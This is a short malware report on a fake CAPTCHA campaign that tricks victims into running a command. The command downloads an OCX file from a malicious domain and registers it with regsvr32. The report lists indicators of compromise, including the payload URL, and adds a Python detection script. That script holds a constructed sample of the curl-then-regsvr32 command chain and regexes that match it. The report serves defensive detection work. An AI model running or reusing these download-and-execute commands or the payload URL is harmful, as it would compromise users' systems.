Malware | Apr 28, 2026
Also related fake captcha page: https://screenly[.]cam/ Command: "cmd /c curl -sko %TEMP%\mscomct...
Malware campaign distributes fake CAPTCHA page and OCX downloader via command injection.
Summary
A malware campaign uses a fake CAPTCHA page hosted at screenly[.]cam to social engineer victims into executing malicious commands. The payload downloads a malicious OCX (ActiveX control) file from xtrafftrck[.]net and registers it via regsvr32, establishing code execution on compromised systems. This represents a classic multi-stage attack combining social engineering with Windows COM object exploitation.
Indicators of Compromise
- domain — screenly.cam
- domain — xtrafftrck.net
- url — https://xtrafftrck.net/files/updater.ocx
Entities
- ActiveX/OCX (technology)
- regsvr32 (technology)
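Detection sketch for the chain described in the Summary (curl drops an OCX in the temp directory, then regsvr32 registers it), run over process command lines. This is an added example, not part of the original report; the sample command lines, file names and `example.invalid` hosts are constructed placeholders, and only the two IoC domains come from this page.

```python
import re

# Domains taken from this page's Indicators of Compromise list.
IOC_DOMAINS = {"screenly.cam", "xtrafftrck.net"}

# curl with an output flag (-o, or bundled short flags such as -sko) followed by
# a token ending in .ocx; [^&|] keeps the match inside one chained command.
CURL_OCX = re.compile(r"\bcurl(?:\.exe)?\b[^&|]*?\s-[a-z]*o\s+(\S+\.ocx)\b", re.I)
REGSVR32 = re.compile(r"\bregsvr32(?:\.exe)?\b", re.I)
TEMP_DIR = re.compile(r"%temp%|\\appdata\\local\\temp\\", re.I)
HOST = re.compile(r"https?://([^/\s\"']+)", re.I)

# Constructed sample process-creation command lines (not taken from the report).
SAMPLE = [
    r"cmd /c curl -sko %TEMP%\sample.ocx https://files.example.invalid/sample.ocx"
    r" && regsvr32 /s %TEMP%\sample.ocx",
    r"curl -sko %TEMP%\report.json https://api.example.invalid/report",
    r"regsvr32 /s C:\Windows\System32\example.ocx",
    r"msedge.exe hxxps://screenly[.]cam/",
]

def refang(text):
    """Undo common defanging so hxxps://host[.]tld matches the plain IoC list."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def analyze(cmdline):
    """Return the set of reasons a command line resembles the reported chain."""
    line = refang(cmdline)
    reasons = set()
    m = CURL_OCX.search(line)
    if m:
        reasons.add("curl_writes_ocx")
        if TEMP_DIR.search(m.group(1)):
            reasons.add("ocx_in_temp")
        # Only count regsvr32 when it appears after the download step.
        if REGSVR32.search(line[m.end():]):
            reasons.add("regsvr32_after_download")
    for host in HOST.findall(line):
        host = host.lower().split(":")[0]
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            reasons.add("ioc_domain")
    return reasons

if __name__ == "__main__":
    for entry in SAMPLE:
        print(sorted(analyze(entry)), "<-", entry)
```

The behavioural reasons fire without any IoC match, so the check still holds if the hosting domains change.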